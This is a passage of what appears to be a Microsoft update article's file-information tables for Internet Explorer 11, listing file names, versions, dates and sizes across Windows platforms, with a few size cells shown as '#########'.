30-Sep-2014| 16:00| 442,992 \nmsdbg2.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 315,008 \npdmproxy100.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 99,984 \nmsrating.dll| 11.0.9600.19507| 5-Oct-2019| 19:57| 168,960 \nicrav03.rat| Not versioned| 23-Sep-2013| 19:25| 8,798 \nticrf.rat| Not versioned| 23-Sep-2013| 19:26| 1,988 \niertutil.dll| 11.0.9600.19963| 12-Feb-2021| 18:44| 2,308,096 \ninseng.dll| 11.0.9600.17416| 30-Oct-2014| 19:56| 91,136 \nVGX.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 818,176 \nurl.dll| 11.0.9600.17416| 30-Oct-2014| 20:24| 235,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,066,432 
\nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,121,216 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,075,136 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,063,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,314,240 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,390,528 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,034,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:39| 2,033,152 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,255,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,061,312 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,326,016 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,019,840 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,071,040 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,082,816 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,170,368 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,153,984 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,291,712 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,283,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,052,096 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,301,952 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,093,056 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,075,648 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,299,392 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,094,592 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,316,800 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,305,536 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,278,912 \nieframe.dll.mui| 11.0.9600.19963| 12-Feb-2021| 20:32| 2,286,080 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,060,288 \nieframe.dll.mui| 
11.0.9600.19846| 23-Sep-2020| 22:30| 2,315,776 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,278,912 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,324,992 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,098,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 1,890,304 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 1,890,304 \nieinstal.exe| 11.0.9600.18921| 9-Feb-2018| 21:35| 475,648 \ninetcomm.dll| 6.3.9600.19963| 12-Feb-2021| 18:17| 880,640 \nINETRES.dll| 6.3.9600.16384| 21-Aug-2013| 21:14| 84,480 \n \n### \n\n__\n\nInternet Explorer 11 on all supported ARM-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nactxprxy.dll| 6.3.9600.19301| 25-Feb-2019| 21:59| 1,064,960 \nhlink.dll| 6.3.9600.19101| 18-Jul-2018| 20:30| 68,608 \npngfilt.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 47,616 \nurlmon.dll| 11.0.9600.19963| 12-Feb-2021| 17:33| 1,039,360 \niexplore.exe| 11.0.9600.19867| 12-Oct-2020| 22:01| 807,816 \nWininetPlugin.dll| 6.3.9600.16384| 21-Aug-2013| 19:52| 33,792 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 46,592 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 56,320 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 57,856 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 10:19| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 47,616 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 49,152 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 55,296 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 45,056 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 51,712 \nwininet.dll.mui| 
11.0.9600.18538| 12-Nov-2016| 13:09| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 39,424 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 35,840 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:10| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 53,760 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:07| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 52,736 \nwininet.dll.mui| 11.0.9600.19963| 12-Feb-2021| 19:30| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:07| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:06| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:06| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:06| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:06| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 31,232 \nhtml.iec| 2019.0.0.19301| 25-Feb-2019| 22:35| 320,000 \ninetcpl.cpl| 11.0.9600.19963| 12-Feb-2021| 17:51| 2,007,040 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 307,200 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 293,888 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 290,304 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 289,280 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 299,008 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 303,104 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 282,112 \nmshtml.dll.mui| 
11.0.9600.19507| 5-Oct-2019| 20:16| 282,112 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:52| 296,960 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 283,648 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 291,840 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 299,520 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 275,968 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:52| 290,816 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 293,376 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 296,960 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 258,048 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 256,512 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 289,280 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 288,256 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 285,184 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 295,424 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 297,472 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 295,424 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 294,400 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 294,400 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 290,816 \nmshtml.dll.mui| 11.0.9600.19963| 12-Feb-2021| 19:30| 290,816 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 286,208 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:48| 281,600 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:48| 286,720 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:48| 292,352 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:48| 242,176 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 243,200 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 243,200 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 73,728 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 67,584 
\nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 78,848 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 15-Aug-2014| 18:39| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 74,752 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 62,464 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 75,264 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:28| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 73,216 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 41,472 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 37,888 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 70,656 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 69,632 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 68,608 \nF12Resources.dll.mui| 11.0.9600.19963| 12-Feb-2021| 19:30| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 59,904 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 
4:26| 69,120 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 29,696 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 30,720 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 30,720 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:03| 63,488 \nDiagnosticsHub.ScriptedSandboxPlugin.dll| 11.0.9600.19963| 12-Feb-2021| 18:04| 215,552 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 46,080 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 51,712 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 54,272 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 10:09| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:04| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 45,056 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:54| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 39,936 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 39,424 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 51,200 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 49,152 
### **Windows Server 2012**

Internet Explorer 11 on all supported x86-based versions

Internet Explorer 11 on all supported x64-based versions
14-Feb-21| 1:48 \nIeframe.dll.mui| 11.0.9600.19963| 2,098,176| 14-Feb-21| 1:48 \nIeframe.dll.mui| 11.0.9600.19963| 1,890,304| 14-Feb-21| 1:49 \nIeframe.dll.mui| 11.0.9600.19963| 1,890,304| 14-Feb-21| 1:50 \nIeframe.dll| 11.0.9600.19963| #########| 13-Feb-21| 2:26 \nIeframe.ptxml| Not applicable| 24,486| 13-Feb-21| 0:23 \nInetres.adml| Not applicable| 457,561| 14-Feb-21| 1:22 \nInetres.adml| Not applicable| 457,561| 14-Feb-21| 1:23 \nInetres.adml| Not applicable| 526,294| 14-Feb-21| 1:24 \nInetres.adml| Not applicable| 499,654| 14-Feb-21| 1:25 \nInetres.adml| Not applicable| 552,337| 14-Feb-21| 1:26 \nInetres.adml| Not applicable| 944,559| 14-Feb-21| 1:26 \nInetres.adml| Not applicable| 457,561| 14-Feb-21| 2:26 \nInetres.adml| Not applicable| 543,946| 14-Feb-21| 1:27 \nInetres.adml| Not applicable| 457,561| 14-Feb-21| 1:28 \nInetres.adml| Not applicable| 526,557| 14-Feb-21| 1:29 \nInetres.adml| Not applicable| 575,838| 14-Feb-21| 1:29 \nInetres.adml| Not applicable| 457,561| 14-Feb-21| 1:30 \nInetres.adml| Not applicable| 457,561| 14-Feb-21| 1:31 \nInetres.adml| Not applicable| 570,737| 14-Feb-21| 1:32 \nInetres.adml| Not applicable| 548,119| 14-Feb-21| 1:33 \nInetres.adml| Not applicable| 639,271| 14-Feb-21| 1:34 \nInetres.adml| Not applicable| 525,504| 14-Feb-21| 1:35 \nInetres.adml| Not applicable| 457,561| 14-Feb-21| 1:36 \nInetres.adml| Not applicable| 488,488| 14-Feb-21| 1:37 \nInetres.adml| Not applicable| 548,494| 14-Feb-21| 1:38 \nInetres.adml| Not applicable| 559,343| 14-Feb-21| 1:39 \nInetres.adml| Not applicable| 535,067| 14-Feb-21| 1:39 \nInetres.adml| Not applicable| 541,455| 14-Feb-21| 1:40 \nInetres.adml| Not applicable| 457,561| 14-Feb-21| 1:41 \nInetres.adml| Not applicable| 804,470| 14-Feb-21| 1:42 \nInetres.adml| Not applicable| 457,561| 14-Feb-21| 1:43 \nInetres.adml| Not applicable| 457,561| 14-Feb-21| 1:44 \nInetres.adml| Not applicable| 503,909| 14-Feb-21| 1:45 \nInetres.adml| Not applicable| 457,561| 14-Feb-21| 1:46 \nInetres.adml| Not 
applicable| 521,583| 14-Feb-21| 1:47 \nInetres.adml| Not applicable| 457,561| 14-Feb-21| 1:47 \nInetres.adml| Not applicable| 420,082| 14-Feb-21| 1:48 \nInetres.adml| Not applicable| 436,651| 14-Feb-21| 1:49 \nInetres.adml| Not applicable| 436,651| 14-Feb-21| 1:50 \nInetres.admx| Not applicable| 1,678,023| 9-Feb-21| 4:02 \nJscript9.dll.mui| 11.0.9600.19963| 29,184| 14-Feb-21| 1:22 \nJscript9.dll.mui| 11.0.9600.19963| 29,696| 14-Feb-21| 1:23 \nJscript9.dll.mui| 11.0.9600.19963| 32,768| 14-Feb-21| 1:24 \nJscript9.dll.mui| 11.0.9600.19963| 33,280| 14-Feb-21| 1:25 \nJscript9.dll.mui| 11.0.9600.19963| 35,328| 14-Feb-21| 1:26 \nJscript9.dll.mui| 11.0.9600.19963| 37,888| 14-Feb-21| 1:26 \nJscript9.dll.mui| 11.0.9600.19963| 29,696| 14-Feb-21| 2:26 \nJscript9.dll.mui| 11.0.9600.19963| 34,304| 14-Feb-21| 1:27 \nJscript9.dll.mui| 11.0.9600.19963| 29,696| 14-Feb-21| 1:28 \nJscript9.dll.mui| 11.0.9600.19963| 33,280| 14-Feb-21| 1:29 \nJscript9.dll.mui| 11.0.9600.19963| 34,304| 14-Feb-21| 1:29 \nJscript9.dll.mui| 11.0.9600.19963| 27,648| 14-Feb-21| 1:30 \nJscript9.dll.mui| 11.0.9600.19963| 29,696| 14-Feb-21| 1:31 \nJscript9.dll.mui| 11.0.9600.19963| 34,304| 14-Feb-21| 1:32 \nJscript9.dll.mui| 11.0.9600.19963| 33,792| 14-Feb-21| 1:33 \nJscript9.dll.mui| 11.0.9600.19963| 23,040| 14-Feb-21| 1:34 \nJscript9.dll.mui| 11.0.9600.19963| 22,016| 14-Feb-21| 1:34 \nJscript9.dll.mui| 11.0.9600.19963| 29,696| 14-Feb-21| 1:36 \nJscript9.dll.mui| 11.0.9600.19963| 31,232| 14-Feb-21| 1:37 \nJscript9.dll.mui| 11.0.9600.19963| 34,304| 14-Feb-21| 1:38 \nJscript9.dll.mui| 11.0.9600.19963| 35,840| 14-Feb-21| 1:39 \nJscript9.dll.mui| 11.0.9600.19963| 32,768| 14-Feb-21| 1:39 \nJscript9.dll.mui| 11.0.9600.19963| 33,280| 14-Feb-21| 1:40 \nJscript9.dll.mui| 11.0.9600.19963| 29,696| 14-Feb-21| 1:41 \nJscript9.dll.mui| 11.0.9600.19963| 34,816| 14-Feb-21| 1:42 \nJscript9.dll.mui| 11.0.9600.19963| 33,280| 14-Feb-21| 1:42 \nJscript9.dll.mui| 11.0.9600.19963| 32,256| 14-Feb-21| 1:43 \nJscript9.dll.mui| 
11.0.9600.19963| 29,696| 14-Feb-21| 1:44 \nJscript9.dll.mui| 11.0.9600.19963| 32,768| 14-Feb-21| 1:45 \nJscript9.dll.mui| 11.0.9600.19963| 29,696| 14-Feb-21| 1:46 \nJscript9.dll.mui| 11.0.9600.19963| 30,720| 14-Feb-21| 1:47 \nJscript9.dll.mui| 11.0.9600.19963| 29,696| 14-Feb-21| 1:47 \nJscript9.dll.mui| 11.0.9600.19963| 16,384| 14-Feb-21| 1:48 \nJscript9.dll.mui| 11.0.9600.19963| 16,896| 14-Feb-21| 1:49 \nJscript9.dll.mui| 11.0.9600.19963| 16,896| 14-Feb-21| 1:50 \nJscript9.dll| 11.0.9600.19963| 5,499,904| 13-Feb-21| 3:04 \nJscript9diag.dll| 11.0.9600.19963| 814,592| 13-Feb-21| 3:03 \nJscript.dll| 5.8.9600.19963| 785,408| 13-Feb-21| 3:04 \nVbscript.dll| 5.8.9600.19963| 581,120| 13-Feb-21| 3:15 \nIexplore.exe| 11.0.9600.19963| 810,400| 14-Feb-21| 0:24 \nMshtml.dll| 11.0.9600.19963| #########| 13-Feb-21| 2:58 \nMshtml.tlb| 11.0.9600.19963| 2,724,864| 13-Feb-21| 2:59 \nWow64_microsoft-windows-ie-htmlrendering.ptxml| Not applicable| 3,228| 13-Feb-21| 0:26 \nIe9props.propdesc| Not applicable| 2,843| 23-Sep-18| 13:32 \nIeframe.dll| 11.0.9600.19963| #########| 13-Feb-21| 2:09 \nWow64_ieframe.ptxml| Not applicable| 24,486| 13-Feb-21| 0:26 \nJscript9.dll| 11.0.9600.19963| 4,112,384| 13-Feb-21| 2:14 \nJscript9diag.dll| 11.0.9600.19963| 620,032| 13-Feb-21| 2:37 \nJscript.dll| 5.8.9600.19963| 653,824| 13-Feb-21| 2:37 \nVbscript.dll| 5.8.9600.19963| 498,176| 13-Feb-21| 2:47 \nUrlmon.dll| 11.0.9600.19963| 1,343,488| 13-Feb-21| 1:50 \nWininet.dll.mui| 11.0.9600.19963| 46,592| 14-Feb-21| 0:26 \nWininet.dll.mui| 11.0.9600.19963| 52,736| 14-Feb-21| 0:27 \nWininet.dll.mui| 11.0.9600.19963| 51,200| 14-Feb-21| 0:27 \nWininet.dll.mui| 11.0.9600.19963| 51,200| 14-Feb-21| 0:28 \nWininet.dll.mui| 11.0.9600.19963| 56,320| 14-Feb-21| 0:29 \nWininet.dll.mui| 11.0.9600.19963| 57,856| 14-Feb-21| 0:30 \nWininet.dll.mui| 11.0.9600.19963| 49,664| 14-Feb-21| 1:59 \nWininet.dll.mui| 11.0.9600.19963| 54,272| 14-Feb-21| 0:31 \nWininet.dll.mui| 11.0.9600.19963| 47,616| 14-Feb-21| 0:32 
\nWininet.dll.mui| 11.0.9600.19963| 49,152| 14-Feb-21| 0:32 \nWininet.dll.mui| 11.0.9600.19963| 55,296| 14-Feb-21| 0:33 \nWininet.dll.mui| 11.0.9600.19963| 45,056| 14-Feb-21| 0:34 \nWininet.dll.mui| 11.0.9600.19963| 51,712| 14-Feb-21| 0:35 \nWininet.dll.mui| 11.0.9600.19963| 51,712| 14-Feb-21| 0:36 \nWininet.dll.mui| 11.0.9600.19963| 53,248| 14-Feb-21| 0:36 \nWininet.dll.mui| 11.0.9600.19963| 39,424| 14-Feb-21| 0:38 \nWininet.dll.mui| 11.0.9600.19963| 35,840| 14-Feb-21| 0:38 \nWininet.dll.mui| 11.0.9600.19963| 50,176| 14-Feb-21| 0:39 \nWininet.dll.mui| 11.0.9600.19963| 51,200| 14-Feb-21| 0:40 \nWininet.dll.mui| 11.0.9600.19963| 50,688| 14-Feb-21| 0:41 \nWininet.dll.mui| 11.0.9600.19963| 52,736| 14-Feb-21| 0:42 \nWininet.dll.mui| 11.0.9600.19963| 53,760| 14-Feb-21| 0:42 \nWininet.dll.mui| 11.0.9600.19963| 54,272| 14-Feb-21| 0:44 \nWininet.dll.mui| 11.0.9600.19963| 52,736| 14-Feb-21| 0:45 \nWininet.dll.mui| 11.0.9600.19963| 51,200| 14-Feb-21| 0:46 \nWininet.dll.mui| 11.0.9600.19963| 53,248| 14-Feb-21| 0:47 \nWininet.dll.mui| 11.0.9600.19963| 52,736| 14-Feb-21| 0:47 \nWininet.dll.mui| 11.0.9600.19963| 51,712| 14-Feb-21| 0:48 \nWininet.dll.mui| 11.0.9600.19963| 50,688| 14-Feb-21| 0:49 \nWininet.dll.mui| 11.0.9600.19963| 50,688| 14-Feb-21| 0:50 \nWininet.dll.mui| 11.0.9600.19963| 50,176| 14-Feb-21| 0:51 \nWininet.dll.mui| 11.0.9600.19963| 30,720| 14-Feb-21| 0:52 \nWininet.dll.mui| 11.0.9600.19963| 30,720| 14-Feb-21| 0:53 \nWininet.dll.mui| 11.0.9600.19963| 30,720| 14-Feb-21| 0:54 \nInetcpl.cpl| 11.0.9600.19963| 2,058,752| 13-Feb-21| 2:12 \nMshtml.dll.mui| 11.0.9600.19963| 307,200| 14-Feb-21| 0:26 \nMshtml.dll.mui| 11.0.9600.19963| 293,888| 14-Feb-21| 0:26 \nMshtml.dll.mui| 11.0.9600.19963| 290,304| 14-Feb-21| 0:27 \nMshtml.dll.mui| 11.0.9600.19963| 289,280| 14-Feb-21| 0:28 \nMshtml.dll.mui| 11.0.9600.19963| 299,008| 14-Feb-21| 0:29 \nMshtml.dll.mui| 11.0.9600.19963| 303,104| 14-Feb-21| 0:30 \nMshtml.dll.mui| 11.0.9600.19963| 282,112| 14-Feb-21| 2:00 \nMshtml.dll.mui| 
11.0.9600.19963| 296,960| 14-Feb-21| 0:31 \nMshtml.dll.mui| 11.0.9600.19963| 283,648| 14-Feb-21| 0:32 \nMshtml.dll.mui| 11.0.9600.19963| 291,840| 14-Feb-21| 0:32 \nMshtml.dll.mui| 11.0.9600.19963| 299,520| 14-Feb-21| 0:33 \nMshtml.dll.mui| 11.0.9600.19963| 275,968| 14-Feb-21| 0:34 \nMshtml.dll.mui| 11.0.9600.19963| 290,816| 14-Feb-21| 0:35 \nMshtml.dll.mui| 11.0.9600.19963| 293,376| 14-Feb-21| 0:36 \nMshtml.dll.mui| 11.0.9600.19963| 296,960| 14-Feb-21| 0:37 \nMshtml.dll.mui| 11.0.9600.19963| 258,048| 14-Feb-21| 0:38 \nMshtml.dll.mui| 11.0.9600.19963| 256,512| 14-Feb-21| 0:39 \nMshtml.dll.mui| 11.0.9600.19963| 289,280| 14-Feb-21| 0:39 \nMshtml.dll.mui| 11.0.9600.19963| 288,256| 14-Feb-21| 0:40 \nMshtml.dll.mui| 11.0.9600.19963| 285,184| 14-Feb-21| 0:41 \nMshtml.dll.mui| 11.0.9600.19963| 295,424| 14-Feb-21| 0:42 \nMshtml.dll.mui| 11.0.9600.19963| 297,472| 14-Feb-21| 0:43 \nMshtml.dll.mui| 11.0.9600.19963| 292,864| 14-Feb-21| 0:44 \nMshtml.dll.mui| 11.0.9600.19963| 295,424| 14-Feb-21| 0:44 \nMshtml.dll.mui| 11.0.9600.19963| 294,400| 14-Feb-21| 0:45 \nMshtml.dll.mui| 11.0.9600.19963| 294,400| 14-Feb-21| 0:46 \nMshtml.dll.mui| 11.0.9600.19963| 292,864| 14-Feb-21| 0:47 \nMshtml.dll.mui| 11.0.9600.19963| 290,816| 14-Feb-21| 0:47 \nMshtml.dll.mui| 11.0.9600.19963| 288,768| 14-Feb-21| 0:48 